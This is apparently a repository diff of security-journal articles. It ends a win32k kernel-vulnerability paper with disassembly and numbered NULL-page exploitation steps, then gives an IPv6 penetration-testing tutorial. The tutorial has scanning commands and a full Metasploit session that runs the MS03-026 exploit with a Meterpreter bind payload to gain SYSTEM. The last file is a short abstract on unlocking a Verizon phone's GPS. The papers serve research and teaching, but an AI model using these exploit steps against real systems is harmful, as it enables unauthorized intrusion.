zero before its modification. Others do not even check the length argument. A
proof of concept has been made on this vulnerability by Ruben Santamarta[11].
The NtUserfnOUTSTRING function vulnerability evades the ProbeForWrite function
and overwrites 1 or 2 bytes of kernel memory. This function disassembly is
below:
In NtUserfnOUTSTRING (WM_GETTEXT)
xor ebx, ebx
inc ebx
push ebx ; Alignment = 1
and eax, ecx ; eax = our size | ecx = 0x7FFFFFFF
push eax ; If our size is 0x80000000 then
; Length is zero (avoid any check)
push esi ; Our kernel address
call ds:__imp__ProbeForWrite@12
or [ebp+var_4], 0FFFFFFFFh
mov eax, [ebp+arg_14]
add eax, 6
and eax, 1Fh
push [ebp+arg_10]
lea ecx, [ebp+var_24]
push ecx
push [ebp+arg_8]
push [ebp+arg_4]
push [ebp+arg_0]
mov ecx, _gpsi
call dword ptr [ecx+eax*4+0Ch] ; Call appropriate sub function
mov edi, eax
test edi, edi
jz loc_BF86A623 ; Something goes wrong
[...]
loc_BF86A623:
cmp [ebp+arg_8], eax ; Submit size was 0 ? (no)
jz loc_BF86A6D1
[...]
push [ebp+arg_18] ; Wide or Multibyte mode
push esi ; Our address
call _NullTerminateString@8 ; <== 0 byte or short overwriting
In this function, a high size (0x80000000) can bypass ProbeForWrite function
verification. After this verification, it calls a function based on win32k
internal function pointer table. This function depends of the calling context.
If it is in the same thread that submitted handle it will go directly on
retrieval function, otherwise it can be cached by another function waiting for
proprietary thread handling this request. This assembly sample highlights null
byte overwriting if other functions failed. The null byte assures that a valid
string is returned. This is not the only way to overwrite memory. By using an
edit box, we could overwrite kernel memory with a custom string but the first
way fit the need.
The exploitation is trivial and will not be detailed in this part. The first
vulnerability already exposed a target address and the way to allocate the
NULL page which were used to demonstrate this vulnerability.
3.3) LoadMenu handle table corruption
The win32k driver implements its own handle mechanism. This system shares a
handle table between user-mode and kernel-mode. This table is mapped into the
user mode address space as read-only and is modified in kernel mode address
space. The MS07-017 bulletin found by Cesar Cerrudo during Month of Kernel
Bugs (MOKB) [13] describes this table and how its modification could permit kernel
code execution. This chapter addresses another vulnerability based on GDI
handle shared table entry misuse.
3.3.1) Handle table
In the GUI architecture, an handle contains different information as an index
in the shared handle table and the object type. The handle table is an array
of the undocumented HANDLE_TABLE_ENTRY structure.
typedef struct _HANDLE_TABLE_ENTRY
{
union
{
PVOID pKernelObject;
ULONG NextFreeEntryIndex; // Used on free state
};
WORD ProcessID;
WORD nCount;
WORD nHandleUpper;
BYTE nType;
BYTE nFlag;
PVOID pUserInfo;
} HANDLE_TABLE_ENTRY; // sizeof(HANDLE_TABLE_ENTRY) == 12
The nType field defines the table entry type. A free entry has the type zero
and nFlag field which defines if it is destroyed or currently in destroy
procedure. Normal handle verification routines check this value before getting
pKernelInfo field which points to the associated kernel handle. In a free
entry, the NextFreeEntryIndex field contains the next free entry index which
is not a pointer but a simple unsigned long value.
The GUI object structure depends of object type but starts with the same
structure which contains corresponding index in the shared handle table. This
architecture lies on both elements. It switches between each table entry and
kernel object depending of needs. A security issue exists if the handle table
is not used as it should.
3.3.2) Vulnerability details
The vulnerability itself exists in win32k's xxxClientLoadMenu function which
does not correctly validate a handle index. This function is called by the
GetSystemMenu function and returns to user-mode using the KeUsermodeCallback
function to retrieve a handle index. The following assembly shows how this
value is used.
and eax, 0FFFFh ; eax is controlled
lea eax, [eax+eax*2] ; index * 3
mov ecx, gSharedTable
mov edi, [ecx+eax*4] ; base + (index * 12)
This assembly sample uses an unchecked handle index and return pKernelObject
field value of target entry. This pointer is returned by the xxxClientLoadMenu
function. Proper verification are not made which permit deleted handle
manipulation. A deleted handle has its NextFreeEntryIndex field set between
0x1 and 0x3FFF. The return value will be in first memory pages.
A system menu is linked to a window object. This window object is designated
by an handle passed as an argument of the GetSystemMenu function. The
spmenuSys field of the window object is set with the returned value of the
xxxClientLoadMenu function. In this specific context, the spmenuSys value is
hardly predictable inside the NULL page. During thread exit, the Window
liberation will look at spmenuSys object and using its index in the shared
table, toggle nFlag field state to destroyed and nType as free. In the case
the NULL page is filled with zero value, it will destroy the first entry in
the GDI shared handle table.
Exploitation is achieved by reusing vulnerable functions once the first entry
has been destroyed. The GetSystemMenu function locks and unlocks the GDI
shared handle table entry linked with kernel object returned by the
xxxClientLoadMenu function. If the entry flag is destroyed the unlock function
calls the type destroy callback. For the first entry, the flag has been set to
destroyed. There is no callback for this type as it is not supposed to be
unlocked. The unlock function will call zero which allows kernel code
execution. This specific handle management architecture stay undocumented.
The purpose of liberation callback inside the thread unlocking procedure is
unusual.
Exploitation steps:
1. Allocate NULL address
2. Exploitation loop - second iteration trigger call zero:
a. Create a dialog
b. Set NULL page data to zero
c. Set a relative jmp at zero address
d. Create a menu graphic handle (or another type).
e. Destroy this menu handle
f. Call GetSystemMenu
g. Intercept user callback and return destroyed menu handle index (mask 0x3fff of the handle)
h. Exit this thread - set zero handle entry as free and destroyed.
There are multiple ways to exploit this vulnerability. The author truly
believes that exploiting the locking procedure could be used on handle leak
vulnerabilities as it was for this vulnerability. Indeed this vulnerability
exploitation stays complex and unusual. This specific context made
exploitation even more interesting.
4) GUI architecture protection
Create a safe software is a hard task that is definitely harder than find
vulnerabilities. This work is even harder when it concerns old components
which must respect compatibility rules. This article does not blame Microsoft
for those vulnerabilities; it presents global issues on Windows architecture.
In Windows Vista, Microsoft starts securing its operating system
environment. The Windows Vista base code is definitely safer than it was.
Some kernel components as the win32k driver are not safe enough and should
be considered as a priority in local operating system security.
The GUI architecture does not respect security basics. Starting from scratch
would certainly be a good option if it was possible. The global organization
of this driver make security audits a mess. In the other hand, the Windows API
shows it responses developer needs. There is a big abstraction layer between
userland API and kernel functions. It can be use to rebuild the win32k driver
without breaking compatibility. The API must follow user needs and be as easy
as it can be. There is no reason that kernel driver exported function could
not be changed in a secure way. It represents an enormous work which would be
achieved only across operating system version. Nevertheless this is necessary.
This modification could also increase performance by reducing unneeded context
switching. There is no clever reason going in the kernel to ask userland a
value that will be returned to userland. The user-mode callback system does
not fit in a consistent GUI architecture.
Local exploitation techniques also highlight unsecure components as kernel
pool and how overwriting some function pointers allow kernel code execution.
In the past, the userland has been hardened as exploitation was too easy and
third parties software could permit compromising a computer. The kernel
performance is critical and adds verification routines and security measure
could break this advantage. The solution should be in operating system
evolution which does not restrict user experience. The hardware improvement
does not forgive that modern operating system requires more resources than
before.
Software development follows fastest way except when a specific result is
expected. A company does not search the better way but something that cost
less for almost the same result. Microsoft did not choose readiness by
starting Security Development Lifecycle (SDL)[14] and should continue in this
way.
5) Conclusion
The Windows kernel components have unequal security verification level. The
main kernel module (ntoskrnl.exe) respects a standard verification dealing
with userland data. The win32k driver does not follow the same rules which
creates messy verification algorithms. This driver has an important
interaction with userland by different mechanism from usual syscall to
userland callback system. This architecture increase attack surface. The
vulnerable parts do not concern usual vulnerabilities but also internal
mechanism as GUI handle system.
Chapter exposed vulnerabilities discovery and exploitation. Local
exploitation has many different attack vectors. Nowadays, the exploitation is
fast and sure, it works at any attempts. The kernel exploitation is possible
though different techniques.
The win32k driver was not built with a secure design and now it becomes so
huge, with so many compatibility restrictions, that every release just
implements new features without changing anything else. Windows Vista
introduces many modifications but most of them are just automatic integer
overflow checks. It will solve many unknown issues but interaction between
user-mode and kernel-mode is hardly predictable. Vulnerabilities are not
always a matter of proper checks but also system interaction and custom
context.
Implementing usual userland protections is not a good solution as kernel
exploitation is larger than overflows. The win32k driver could change by using
userland abstract layer in order to keep compatibility. This choice is not the
easier as it asks more time and work. The patch evoked in this paper
ameliorates a little bit win32k security as it goes deeper than reported
vulnerabilities. However the Windows Vista version of the win32k driver was
concerned by two vulnerabilities even if it was already more secure. Minor
modifications do not solve security issues. The overall kernel security has
been discussed on different paper about vulnerabilities but also rootkits.
Everyone agree that operating systems must evolve. Windows Seven could
introduce a new right architecture which secure critical component or just
improve win32k driver security.
References
[1] Microsoft Corporation. Microsoft Security Bulletin MS08-025
http://www.microsoft.com/technet/security/Bulletin/MS08-025.mspx
[2] Microsoft Corporation. Windows User Interface.
http://msdn.microsoft.com/en-us/library/ms632587(VS.85).aspx
[3] Microsoft Corporation. SendMessage function.
http://msdn.microsoft.com/en-us/library/ms644950.aspx
[4] ivanlef0u. You failed (blog entry about KeUsermodeCallback function in French).
http://www.ivanlef0u.tuxfamily.org/?p=68
[5] Microsoft Corporation. About Dynamic Data Exchange.
http://msdn.microsoft.com/en-us/library/ms648774.aspx
[6] Microsoft Corporation. DDE Support in Internet Explorer Versions (still supported in ie7).
http://support.microsoft.com/kb/160957
[7] Wikipedia. Integer overflow.
http://en.wikipedia.org/wiki/Integeroverflow
[8] mxatone and ivanlef0u. Stealth hooking : Another way to subvert the Windows kernel.
http://www.phrack.org/issues.html?issue=65&id=4#article
[9] Kostya Kortchinsky. Kernel pool exploitation (Syscan Hong Kong 2008).
http://www.syscan.org/hk/indexhk.html
[10] Ruben Santamarta. Exploiting common flaws in drivers.
http://www.reversemode.com/index.php?option=comremository&Itemid=2&func=fileinfo&id=51
[11] Ruben Santamarta. Exploit for win32k!ntUserFnOUTSTRING (MS08-25/n).
http://www.reversemode.com/index.php?option=com_content&task=view&id=50&Itemid=1
[12] Microsoft Corporation. MS08-025: Win32k vulnerabilities.
http://blogs.technet.com/swi/archive/2008/04/09/ms08-025-win32k-vulnerabilities.aspx
[13] Cesar Cerrudo. Microsoft Windows kernel GDI local privilege escalation.
http://projects.info-pull.com/mokb/MOKB-06-11-2006.html
[14] Microsoft Corporation. Steve Lipner and Michael Howard. The Trustworthy Computing Security Development Lifecycle
http://msdn.microsoft.com/en-us/library/ms995349.aspx

484
uninformed/10.4.txt Normal file
View File

@ -0,0 +1,484 @@
Exploiting Tomorrow's Internet Today: Penetration testing with IPv6
10/2008
H D Moore
hdm@metasploit.com
Abstract: This paper illustrates how IPv6-enabled systems with link-local and
auto-configured addresses can be compromised using existing security tools.
While most of the techniques described can apply to "real" IPv6 networks, the
focus of this paper is to target IPv6-enabled systems on the local network.
Acknowledgments: The author would like to thank Van Hauser of THC for his
excellent presentation at CanSecWest 2005 and for releasing the IPv6 Attack
Toolkit. Much of the background information in this paper is based on notes
from Van Hauser's presentation. The 'alive6' tool included with the IPv6
Attack Toolkit is the critical first step for all techniques described in this
paper. The author would like to thank Philippe Biondi for his work on SCAPY
and for his non-traditional 3-D presentation on IPv6 routing headers at
CanSecWest 2007.
1) Introduction
The next iteration of the IP protocol, version 6, has been "just around the
corner" for nearly 10 years. Migration deadlines have come and gone,
networking vendors have added support, and all modern operating systems are
IPv6-ready. The problem is that few organizations have any intention of
implementing IPv6. The result is that most corporate networks contain machines
that have IPv6 networking stacks, but have not been intentionally configured
with IPv6. The IPv6 stack represents an attack surface that is often
overlooked in corporate environments. For example, many firewall products,
such as ZoneAlarm on Windows and the standard IPTables on Linux, do not block
IPv6 traffic (IPTables can, but it uses Netfilter6 rules instead). The goal of
this paper is to demonstrate how existing tools can be used to compromise IPv6
enabled systems.
1.2) Operating System
All tools described in this paper were launched from an Ubuntu Linux 8.04
system. If you are using Microsoft Windows, Mac OS X, BSD, or another Linux
distribution, some tools may work differently or not at all.
1.3) Configuration
All examples in this paper depend on the host system having a valid IPv6 stack
along with a link-local or auto-configured IPv6 address. This requires the
IPv6 functionality to be compiled into the kernel or loaded from a kernel
module. To determine if your system has an IPv6 address configured for a
particular interface, use the ifconfig command:
# ifconfig eth0 | grep inet6
inet6 addr: fe80::0102:03ff:fe04:0506/64 Scope:Link
1.4) Addressing
IPv6 addresses consist of 128 bits (16 bytes) and are represented as a groups
of four hex digits separated by colons. A set of two colons ("::") indicates
that the bits leading up to the next part of the address should be all zero.
For example, the IP address for the loopback/localhost consists of 15 NULL
bytes followed by one byte set to the value of 0x01. The representation for
this address is simply "::1" (IPv4 127.0.0.1). The "any" IPv6 address is
represented as "::0" or just "::" (IPv4 0.0.0.0). In the case of link-local
addresses, the prefix is always "fe80::" followed by the EUI-64 formatted MAC
address, while auto-configured addresses always have the prefix of "2000::".
The "::" sequence can only be used once within an IPv6 address (it would be
ambiguous otherwise). The following examples demonstrate how the "::" sequence
is used.
0000:0000:0000:0000:0000:0000:0000:0000 == ::, ::0, 0::0, 0:0::0:0
0000:0000:0000:0000:0000:0000:0000:0001 == ::1, 0::1, 0:0::0:0001
fe80:0000:0000:0000:0000:0000:0000:0060 == fe80::60
fe80:0000:0000:0000:0102:0304:0506:0708 == fe80::0102:0304:0506:0708
1.5) Link-local vs Site-local
On a given local network, all IPv6 nodes have at least one link-local address
(fe80::). During the automatic configuration of IPv6 for a network adapter, a
link-local address is chosen, and an IPv6 router discovery request is sent to
the all-routers broadcast address. If any IPv6-enabled router responds, the
node will also choose a site-local address for that interface (2000::). The
router response indicates whether to use DHCPv6 or the EUI-64 algorithm to
choose a site-local address. On networks where there are no active IPv6
routers, an attacker can reply to the router discovery request and force all
local IPv6 nodes to configure a site-local address.
2) Discovery
2.1) Scanning
Unlike the IPv4 address space, it is not feasible to sequentially probe IPv6
addresses in order to discover live systems. In real deployments, it is common
for each endpoint to receive a 64-bit network range. Inside that range, only
one or two active nodes may exist, but the address space is over four
billion times the size of the entire IPv4 Internet. Trying to discover live
systems with sequential probes within a 64-bit IP range would require at
least 18,446,744,073,709,551,616 packets.
2.2) Management
In order to manage hosts within large IPv6 network ranges, DNS and other
naming services are absolutely required. Administrators may be able to
remember an IPv4 address within a subnet, but tracking a 64-bit host ID within
a local subnet is a challenge. Because of this requirement, DNS, WINS, and
other name services are critical for managing the addresses of IPv6 hosts.
Since the focus of this paper is on "accidental" IPv6 networks, we will not be
covering IPv6 discovery through host management services.
2.3) Neighbor Discovery
The IPv4 ARP protocol goes away in IPv6. Its replacement consists of the
ICMPv6 Neighbor Discovery (ND) and ICMPv6 Neighbor Solicitation (NS)
protocols. Neighbor Discovery allows an IPv6 host to discover the link-local
and auto-configured addresses of all other IPv6 systems on the local network.
Neighbor Solicitation is used to determine if a given IPv6 address exists on
the local subnet. The linklocal address is guaranteed to be unique per-host,
per-link, by picking an address generated by the EUI-64 algorithm. This
algorithm uses the network adapter MAC address to generate a unique IPv6
address. For example, a system with a hardware MAC of 01:02:03:04:05:06 would
use a link-local address of fe80::0102:03FF:FE04:0506. An eight-byte prefix is
created by taking the first three bytes of the MAC, appending FF:FE, and then
the next three bytes of the MAC. In addition to link-local addresses, IPv6
also supports stateless auto-configuration. Stateless auto-configured
addresses use the "2000::" prefix. More information about Neighbor Discovery
can be found in RFC 2461.
2.4) The IPv6 Attack Toolkit
In order to enumerate local hosts using the Neighbor Discovery protocol, we
need a tool which can send ICMPv6 probes and listen for responses. The alive6
program included with Van Hauser's IPv6 Attack Toolkit is the tool for the
job. The example below demonstrates how to use alive6 to discover IPv6 hosts
attached to the network on the eth0 interface.
# alive6 eth0
Alive: fe80:0000:0000:0000:xxxx:xxff:fexx:xxxx
Alive: fe80:0000:0000:0000:yyyy:yyff:feyy:yyyy
Found 2 systems alive
2.5) Linux Neighbor Discovery Tools
The 'ip' command, in conjunction with 'ping6', both included with many recent
Linux distributions, can also be used to perform local IPv6 node discovery.
The following commands demonstrate this method:
# ping6 -c 3 -I eth0 ff02::1 >/dev/null 2>&1
# ip neigh | grep ^fe80
fe80::211:43ff:fexx:xxxx dev eth0 lladdr 00:11:43:xx:xx:xx REACHABLE
fe80::21e:c9ff:fexx:xxxx dev eth0 lladdr 00:1e:c9:xx:xx:xx REACHABLE
fe80::218:8bff:fexx:xxxx dev eth0 lladdr 00:18:8b:xx:xx:xx REACHABLE
[...]
2.6) Local Broadcast Addresses
IPv6 Neighbor Discovery relies on a set of special broadcast addresses in
order to reach all local nodes of a given type. The table below enumerates the
most useful of these addresses.
- FF01::1 = This address reaches all node-local IPv6 nodes
- FF02::1 = This address reaches all link-local IPv6 nodes
- FF05::1 = This address reaches all site-local IPv6 nodes
- FF01::2 = This address reaches all node-local IPv6 routers
- FF02::2 = This address reaches all link-local IPv6 routers
- FF05::2 = This address reaches all site-local IPv6 routers
2.7) IPv4 vs IPv6 Broadcasts
The IPv4 protocol allowed packets destined to network broadcast addresses to
be routed across the Internet. While this had some legitimate uses, this
feature was abused for years by traffic amplification attacks, which spoofed a
query to a broadcast address from a victim in order to saturate the victim's
bandwidth with the responses. While some IPv4 services were designed to work
with broadcast addresses, this is the exception and not the norm. With the
introduction of IPv6, broadcast addresses are no longer routed outside of the
local network. This mitigates traffic amplification attacks, but also prevents
a host from sending Neighbor Discovery probes into remote networks.
One of the major differences between IPv4 and IPv6 is how network services
which listen on the "any" address (0.0.0.0 / ::0) handle incoming requests
destined to the broadcast address. A good example of this is the BIND DNS
server. When using IPv4 and listening to 0.0.0.0, DNS requests sent to the
network broadcast address are simply ignored. When using IPv6 and listening to
::0, DNS requests sent to the link-local all nodes broadcast address (FF02::1)
are processed. This allows a local attacker to send a message to all BIND
servers on the local network with a single packet. The same technique will
work for any other UDP-based service bound to the ::0 address of an
IPv6-enabled interface.
$ dig metasploit.com @FF02::1
;; ANSWER SECTION:
metasploit.com. 3600 IN A 216.75.15.231
;; SERVER: fe80::xxxx:xxxx:xxxx:xxxx%2#53(ff02::1)
3) Services
3.1) Using Nmap
The Nmap port scanner has support for IPv6 targets, however, it can only scan
these targets using the native networking libraries and does not have the
ability to send raw IPv6 packets. This limits TCP port scans to the
"connect()" method, which while effective, is slow against firewalled hosts
and requires a full TCP connection to identify each open port. Even with these
limitations, Nmap is still the tool of choice for IPv6 port scanning. Older
versions of Nmap did not support scanning link-local addresses, due to the
requirement of an interface suffix. Trying to scan a link-local address would
result in the following error.
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx
Starting Nmap 4.53 ( http://insecure.org ) at 2008-08-23 14:48 CDT
Strange error from connect (22):Invalid argument
The problem is that link-local addresses are interface specific. In order to
talk to to the host at fe80::xxxx:xxxx:xxxx:xxxx, we must indicate which
interface it is on as well. The way to do this on the Linux platform is by
appending a "%" followed by the interface name to the address. In this case,
we would specify "fe80::xxxx:xxxx:xxxx:xxxx%eth0". Recent versions of Nmap
(4.68) now support the interface suffix and have no problem scanning
link-local IPv6 addresses. Site-local addresses do not require a scope ID
suffix, which makes them a little bit easier to use from an attacker's
perspective (reverse connect code doesn't need to know the scope ID, just the
address).
# nmap -6 fe80::xxxx:xxxx:xxxx:xxxx%eth0
Starting Nmap 4.68 ( http://nmap.org ) at 2008-08-27 13:57 CDT
PORT STATE SERVICE
22/tcp open ssh
3.2) Using Metasploit
The development version of the Metasploit Framework includes a simple TCP port
scanner. This module accepts a list of hosts via the RHOSTS parameter and a
start and stop port. The Metasploit Framework has full support for IPv6
addresses, including the interface suffix. The following example scans ports 1
through 10,000 on the target fe80::xxxx:xxxx:xxxx:xxxx connected via interface
eth0. This target is a default install of Vista Home Premium.
# msfconsole
msf> use auxiliary/discovery/portscan/tcp
msf auxiliary(tcp) > set RHOSTS fe80::xxxx:xxxx:xxxx:xxxx%eth0
msf auxiliary(tcp) > set PORTSTART 1
msf auxiliary(tcp) > set PORTSTOP 10000
msf auxiliary(tcp) > run
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:135
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:445
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1025
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1026
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1027
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1028
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1029
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:1040
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:3389
[*] TCP OPEN fe80:0000:0000:0000:xxxx:xxxx:xxxx:xxxx%eth0:5357
[*] Auxiliary module execution completed
In addition to TCP port scanning, the Metasploit Framework also includes a UDP
service detection module. This module sends a series of UDP probes to every
host defined by RHOSTS and prints out any responses received. This module
works with any IPv6 address, including the broadcast. For example, the session
below demonstrates discovery of a local DNS service that is listening on ::0
and responds to requests for the link-local all nodes broadcast address.
# msfconsole
msf> use auxiliary/scanner/discovery/sweep_udp
msf auxiliary(sweep_udp) > set RHOSTS ff02::1
msf auxiliary(sweep_udp) > run
[*] Sending 7 probes to ff02:0000:0000:0000:0000:0000:0000:0001 (1 hosts)
[*] Discovered DNS on fe80::xxxx:xxxx:xxxx:xxxx%eth0
[*] Auxiliary module execution completed
4) Exploits
4.1) IPv6 Enabled Services
When conducting a penetration test against an IPv6 enabled system, the first
step is to determine what services are accessible over IPv6. In the previous
section, we described some of the tools available for doing this, but did not
cover the differences between the IPv4 and IPv6 interfaces of the same
machine. Consider the Nmap results below, the first set is from scanning the
IPv6 interface of a Windows 2003 system, while the second is from scanning the
same system's IPv4 address.
# nmap -6 -p1-10000 -n fe80::24c:44ff:fe4f:1a44%eth0
80/tcp open http
135/tcp open msrpc
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
9464/tcp open unknown
# nmap -sS -p1-10000 -n 192.168.0.147
25/tcp open smtp
42/tcp open nameserver
53/tcp open domain
80/tcp open http
110/tcp open pop3
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
554/tcp open rtsp
1025/tcp open NFS-or-IIS
1026/tcp open LSA-or-nterm
1027/tcp open IIS
1030/tcp open iad1
1032/tcp open iad3
1034/tcp open unknown
1035/tcp open unknown
1036/tcp open unknown
1755/tcp open wms
3389/tcp open ms-term-serv
9464/tcp open unknown
Of the services provided by IIS, only the web server and streaming media
services appear to be IPv6 enabled. The SMTP, POP3, WINS, NetBIOS, and RDP
services were all missing from our scan of the IPv6 address. While this does
limit the attack surface on the IPv6 interface, the remaining services are
still significant in terms of exposure. The SMB port (445) allows access to
file shares and remote API calls through DCERPC. All TCP DCERPC services are
still available, including the endpoint mapper, which provides us with a list
of DCERPC applications on this system. The web server (IIS 6.0) is accessible,
along with any applications hosted on this system. The streaming media
services RTSP (554) and MMS (1755) provide access to the streaming content and
administrative interfaces.
4.2) IPv6 and Web Browsers
While most modern web browsers have support for IPv6 addresses within the URL
bar, there are complications. For example, with the Windows 2003 system above,
we see that port 80 is open. To access this web server with a browser, we use
the following URL:
http://[fe80::24c:44ff:fe4f:1a44%eth0]/
Unfortunately, while Firefox and Konqueror can process this URL, Internet
Explorer (6 and 7) cannot. Since this is a link-local address, DNS is not
sufficient, because the local scope ID is not recognized in the URL. An
interesting difference between Firefox 3 and Konqueror is how the Host header
is created when specifying a IPv6 address and scope ID. With Firefox 3, the
entire address, including the local scope ID is sent in the HTTP Host header.
This causes IIS 6.0 to return an "invalid hostname" error back to the browser.
However, Konqueror will strip the local scope ID from the Host header, which
prevents IIS from throwing the error message seen by Firefox.
4.3) IPv6 and Web Assessments
One of the challenges with assessing IPv6-enabled systems is making existing
security tools work with the IPv6 address format (especially the local scope
ID). For example, the Nikto web scanner is an excellent tool for web
assessments, but it does not have direct support for IPv6 addresses. While we
can add an entry to /etc/hosts for the IPv6 address we want to scan and pass
this to Nikto, Nikto is unable to process the scope ID suffix. The solution to
this and many other tool compatibility issues is to use a TCPv4 to TCPv6 proxy
service. By far, the easiest tool for the job is Socat, which is available as
a package on most Linux and BSD distributions. To relay local port 8080 to
remote port 80 on a link-local IPv6 address, we use a command like the one
below:
$ socat TCP-LISTEN:8080,reuseaddr,fork TCP6:[fe80::24c:44ff:fe4f:1a44%eth0]:80
Once Socat is running, we can launch Nikto and many other tools against port
8080 on 127.0.0.1.
$ ./nikto.pl -host 127.0.0.1 -port 8080
- Nikto v2.03/2.04
---------------------------------------------------------------------------
+ Target IP: 127.0.0.1
+ Target Hostname: localhost
+ Target Port: 8080
+ Start Time: 2008-10-01 12:57:18
---------------------------------------------------------------------------
+ Server: Microsoft-IIS/6.0
This port forwarding technique works for many other tools and protocols and is
a great fall-back when the tool of choice does not support IPv6 natively.
4.4) Exploiting IPv6 Services
The Metasploit Framework has native support for IPv6 sockets, including the
local scope ID. This allows nearly all of the exploit and auxiliary modules to
be used against IPv6 hosts with no modification. In the case of web
application exploits, the VHOST parameter can be used to override the Host
header sent by the module, avoiding issues like the one described above.
4.5) IPv6 Enabled Shellcode
To restrict all exploit activity to the IPv6 protocol, not only do the
exploits need support for IPv6, but the payloads as well. IPv6 payload support
is available in Metasploit through the use of "stagers". These stagers can be
used to chain-load any of the common Windows payloads included with the
Metasploit Framework. Once again, link-local addresses make this process a
little more complicated. When using the bind_ipv6_tcp stager to open a listening
port on the target machine, the RHOST parameter must have the local scope ID
appended. By the same token, the reverse_ipv6_tcp stager requires that the LHOST
variable have remote machine's interface number appended as a scope ID. This
can be tricky, since the attacker rarely knows what interface number a given
link-local address corresponds to. For this reason, the bind_ipv6_tcp stager is
ultimately more useful for exploiting Windows machines with link-local
addresses. The example below demonstrates using the bind_ipv6_tcp stager with
the Meterpreter stage. The exploit in this case is MS03-036 (Blaster) and is
delivered over the DCERPC endpoint mapper service on port 135.
msf> use windows/exploit/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > set RHOST fe80::24c:44ff:fe4f:1a44%eth0
msf exploit(ms03_026_dcom) > set PAYLOAD windows/meterpreter/bind_ipv6_tcp
msf exploit(ms03_026_dcom) > set LPORT 4444
msf exploit(ms03_026_dcom) > exploit
[*] Started bind handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...]
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:[...][135]
[*] Sending exploit ...
[*] The DCERPC service did not reply to our request
[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73227 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened
msf exploit(ms03_026_dcom) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
5) Summary
5.1) Key Concepts
Even though most networks are not "IPv6" ready, many of the machines on those
networks are. The introduction of a new protocol stack introduces security
challenges that are not well-known and often overlooked during security
evaluations. The huge address range of IPv6 makes remote discovery of IPv6
machines difficult, but local network discovery is still possible using the
all-nodes broadcast addresses. Link-local addresses are tied to a specific
network link and are only guaranteed unique on that network link where they
reside. In order to communicate with an IPv6 node using a link-local address,
the user must have knowledge of the local scope ID (interface) for that link.
In order for a remote application to connect back to the user over a
link-local address, the socket code must specify the local scope ID of the
correct interface. UDP services which listen on the IPv6 ANY address (::0)
will respond to client requests that are sent to the all-nodes broadcast
address (FF02::1), which differs from IPv4. IPv6 broadcast traffic is not
routable, which limits many attacks to the local network only. Even though
many flavors of Linux, BSD, and Windows now enable IPv6 by default, not all
applications support listening on the IPv6 interfaces. Software firewalls
often allow IPv6 traffic even when configured to block all IPv4 traffic.
Immunity CANVAS, the Metasploit Framework, the Nmap Security Scanner, and many
other security tools now support IPv6 targets. It is possible to use a tool
written for IPv4 against an IPv6 host by using a socket relay tool such as
xinetd or socat.
5.2) Conclusion
Although the IPv6 backbone infrastructure continues to grow and an increasing
number of client systems and devices support IPv6 out of the box, few ISPs are
able to provide routing between the customer site and the backbone. Until this
gap is closed, security assessments against IPv6 addresses will be limited to
the local network. The lack of awareness about IPv6 in most organizations can
provide an easy way for an attacker to bypass network controls and fly under
the radar of many security monitoring tools. After all, when confronted with
the message below, what is an administrator to do?
References
Exploits
- THC IPv6 Attack Toolkit - http://freeworld.thc.org/thc-ipv6/
- The Metasploit Framework - http://metasploit.com
- Immunity CANVAS - http://www.immunitysec.com/
Tools
- ncat - svn co svn://svn.insecure.org/ncat (login: guest/guest)
- socat - http://www.dest-unreach.org/socat/
- scapy - http://www.secdev.org/projects/scapy/
- nmap - http://nmap.org/
- nikto - http://www.cirt.net/nikto2
Documentation
- RFC 2461 - http://www.ietf.org/rfc/rfc2461.txt
- Official IPv6 Site - http://www.ipv6.org/
Application Compatibility
- http://www.deepspace6.net/docs/ipv6statuspageapps.htm l
- http://www.stindustries.net/IPv6/tools.htm l
- http://www.ipv6.org/v6-apps.htm l
- http://applications.6pack.org/browse/support/

24
uninformed/10.txt Normal file
View File

@ -0,0 +1,24 @@
Engineering in Reverse
Can you find me now? Unlocking the Verizon Wireless xv6800 (HTC Titan) GPS
Skywing
In August 2008 Verizon Wireless released a firmware upgrade for their xv6800 (rebranded HTC Titan) line of Windows Mobile smartphones that provided a number of new features previously unavailable on the device on the initial release firmware. In particular, support for accessing the device's built-in Qualcomm gpsOne assisted GPS chipset was introduced with this update. However, Verizon Wireless elected to attempt to lock down the GPS hardware on xv6800 such that only applications authorized by Verizon Wireless would be able to access the device's built-in GPS hardware and perform location-based functions (such as GPS-assisted navigation). The mechanism used to lock down the GPS hardware is entirely client-side based, however, and as such suffers from fundamental limitations in terms of how effective the lockdown can be in the face of an almost fully user-programmable Windows Mobile-based device. This article outlines the basic philosophy used to prevent unauthorized applications from accessing the GPS hardware and provides a discussion of several of the flaws inherent in the chosen design of the protection mechanism. In addition, several pitfalls relating to debugging and reverse engineering programs on Windows Mobile are also discussed. Finally, several suggested design alterations that would have mitigated some of the flaws in the current GPS lock down system from the perspective of safeguarding the privacy of user location data are also presented.
pdf | html | txt
